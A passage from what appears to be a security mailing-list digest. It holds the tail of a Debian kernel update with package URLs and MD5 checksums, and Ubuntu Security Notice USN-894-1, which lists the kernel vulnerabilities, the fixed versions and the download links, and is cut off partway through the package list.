0b93c7c909eca04fad4fa45e3e73e96c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 248700 13266a2acd5fcbd75d11049dd5e5ad58 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 218314 4174dec1c73ca114469cbb88fba32926

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 16567710 29d2ab68b4259a1822a2ca19e9494f5d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 309868 d69b27ef946f2ac62b115e0200fe8002 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 26988356 f0d885b353b15dc42e4e76da8a8fb129 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 248150 7c585f74e0752a631050b13b9740c0c3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 13318088 0b0a8b724245ac10817b03c4cf734827 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 83484 a678208f18017a9c87d45548916fd98e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 311392 5b1f0957a2756b04be6c95ae8ca5e2c8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 21736368 02da1a4e543b8c5082476b156281cb31 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 247968 929ca712a0aa0984f9dc2a6f68f405a5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 16632240 c9de1dfccb8a5cb5d5d652ca694a7108 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 3805532 be10a8b64da3adf7ece3846b0b0bf930 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 83434 ac0cb9b5939e4ea82c3c83a1a1d473ed http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 248174 50e84058a7d710f013f92e1fe68a705c

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 322474 2d7e39cf0b78d98125a0baba377f1af0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 19195556 bb2bd8e203cee7b3c6739d5c5d11901a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 324008 3b021bb4b3dac72dc68e701f4a209939 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 295928 ca2bf1c3c12f409e469c516877a8e91c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 21170062 4022dbff73ebfde3a846ce38896cf09c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 322502 4b76cce255e1fcc72cb82053cd34a1a2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 17459240 ad749c6e735e58d775b7190ff3d26e50 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 83466 a041c0fdb383832cf725723ce22e40c0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 83430 392d415932625b1a69dc6494d2f737e0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 3674486 200fdcca2140a97f961a37d70db620d5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 19487244 b42ad8431643d89a1f8b0e6e0aaeb39e

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 83532 a1c34683fe304f1a86bbc28f6cbc654c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 83556 bf7fed1ef4da92d782409fe8345f861a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 6976486 5b5db16fea4336068bbcd5bff56ad575 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 7228452 75c044fa17d6071de36579a1491c2e1b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 3431908 18825f85900faca81b21e48d43af6ee7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 197006 0a44248e77ec1ff027edd032ebe5b2c6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 1503494 bd7f7b7bd4e120472bf60ad0b7d9184e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 196810 f03114c2f256a97b15f88d2659f9501b

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 83428 1ea7179752fbb45e10e731991583db68 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 263546 ef894d6917cbe692ec9197048538d5e7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 3651402 a0194c650712040f81e97d5b3b62bc79 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 264892 0b642e20f00b52c20b6ae9e0ee1f78b8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 83442 6d109d7f131dab564736e2ac6a85dd29 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 13318532 dbce062bfa560c331b75bed073868e1d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 13019464 b0b153fafa43b650e996a9d84bbb26d7

These changes will probably be included in the oldstable distribution on its next update. =========================================================== Ubuntu Security Notice USN-894-1 February 05, 2010 linux, linux-source-2.6.15 vulnerabilities CVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138, CVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538, CVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.82 linux-image-2.6.15-55-686 2.6.15-55.82 linux-image-2.6.15-55-amd64-generic 2.6.15-55.82 linux-image-2.6.15-55-amd64-k8 2.6.15-55.82 linux-image-2.6.15-55-amd64-server 2.6.15-55.82 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.82 linux-image-2.6.15-55-hppa32 2.6.15-55.82 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.82 linux-image-2.6.15-55-hppa64 2.6.15-55.82 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.82 linux-image-2.6.15-55-itanium 2.6.15-55.82 linux-image-2.6.15-55-itanium-smp 2.6.15-55.82 linux-image-2.6.15-55-k7 2.6.15-55.82 linux-image-2.6.15-55-mckinley 2.6.15-55.82 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc 2.6.15-55.82 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.82 linux-image-2.6.15-55-server 2.6.15-55.82 linux-image-2.6.15-55-server-bigiron 2.6.15-55.82 linux-image-2.6.15-55-sparc64 2.6.15-55.82 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.82

Ubuntu 8.04 LTS: linux-image-2.6.24-27-386 2.6.24-27.65 linux-image-2.6.24-27-generic 2.6.24-27.65 linux-image-2.6.24-27-hppa32 2.6.24-27.65 linux-image-2.6.24-27-hppa64 2.6.24-27.65 linux-image-2.6.24-27-itanium 2.6.24-27.65 linux-image-2.6.24-27-lpia 2.6.24-27.65 linux-image-2.6.24-27-lpiacompat 2.6.24-27.65 linux-image-2.6.24-27-mckinley 2.6.24-27.65 linux-image-2.6.24-27-openvz 2.6.24-27.65 linux-image-2.6.24-27-powerpc 2.6.24-27.65 linux-image-2.6.24-27-powerpc-smp 2.6.24-27.65 linux-image-2.6.24-27-powerpc64-smp 2.6.24-27.65 linux-image-2.6.24-27-rt 2.6.24-27.65 linux-image-2.6.24-27-server 2.6.24-27.65 linux-image-2.6.24-27-sparc64 2.6.24-27.65 linux-image-2.6.24-27-sparc64-smp 2.6.24-27.65 linux-image-2.6.24-27-virtual 2.6.24-27.65 linux-image-2.6.24-27-xen 2.6.24-27.65

Ubuntu 8.10: linux-image-2.6.27-17-generic 2.6.27-17.45 linux-image-2.6.27-17-server 2.6.27-17.45 linux-image-2.6.27-17-virtual 2.6.27-17.45

Ubuntu 9.04: linux-image-2.6.28-18-generic 2.6.28-18.59 linux-image-2.6.28-18-imx51 2.6.28-18.59 linux-image-2.6.28-18-iop32x 2.6.28-18.59 linux-image-2.6.28-18-ixp4xx 2.6.28-18.59 linux-image-2.6.28-18-lpia 2.6.28-18.59 linux-image-2.6.28-18-server 2.6.28-18.59 linux-image-2.6.28-18-versatile 2.6.28-18.59 linux-image-2.6.28-18-virtual 2.6.28-18.59

Ubuntu 9.10: kernel-image-2.6.31-108-imx51-di 2.6.31-108.21 linux-image-2.6.31-19-386 2.6.31-19.56 linux-image-2.6.31-19-generic 2.6.31-19.56 linux-image-2.6.31-19-generic-pae 2.6.31-19.56 linux-image-2.6.31-19-ia64 2.6.31-19.56 linux-image-2.6.31-19-lpia 2.6.31-19.56 linux-image-2.6.31-19-powerpc 2.6.31-19.56 linux-image-2.6.31-19-powerpc-smp 2.6.31-19.56 linux-image-2.6.31-19-powerpc64-smp 2.6.31-19.56 linux-image-2.6.31-19-server 2.6.31-19.56 linux-image-2.6.31-19-sparc64 2.6.31-19.56 linux-image-2.6.31-19-sparc64-smp 2.6.31-19.56 linux-image-2.6.31-19-virtual 2.6.31-19.56 linux-image-2.6.31-211-dove 2.6.31-211.22 linux-image-2.6.31-211-dove-z0 2.6.31-211.22 linux-image-2.6.31-304-ec2 2.6.31-304.10

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06) the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. Ubuntu 9.10 was not affected. (CVE-2009-4021)

It was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. Ubuntu 6.06 was not affected. Ubuntu 6.06 was not affected. (CVE-2009-4138)

Tavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)

Neil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames. (CVE-2009-4536, CVE-2009-4538)

It was discovered that "print-fatal-signals" reporting could show arbitrary kernel memory contents. A local attacker could exploit this, leading to a loss of privacy. (CVE-2010-0003)

Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. Only Ubuntu 9.04 and 9.10 were affected. A local attacker could disrupt network traffic, leading to a denial of service. (CVE-2010-0291)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz
  Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc
  Size/MD5:     2921 682576890de917043eccf6fc9398aed2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb
  Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb
  Size/MD5:    96386 b184441d2f44037554d037d217688393
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb
  Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     2312 d464c76f98a4142add7a69aca1305739
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49160 a512718368004f81e83063ea8972c871
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36776 fcb0833daefa645545a2451824094b21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   287606 f3cc835959f215c209dc5a825596849c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5:   872448 1a70a906bccd7642241535f79feddb57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb
  Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   202666 71d8be83541874d6c675945838b9e223
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49294 e4a805200acaaea274e67995602294e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    35158 0869bee234a54b1afe362123606efe66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    33806 ebf707126fa6326899d648786afa8779
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38938 75eb074224a6373013e621cdd5931a51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96
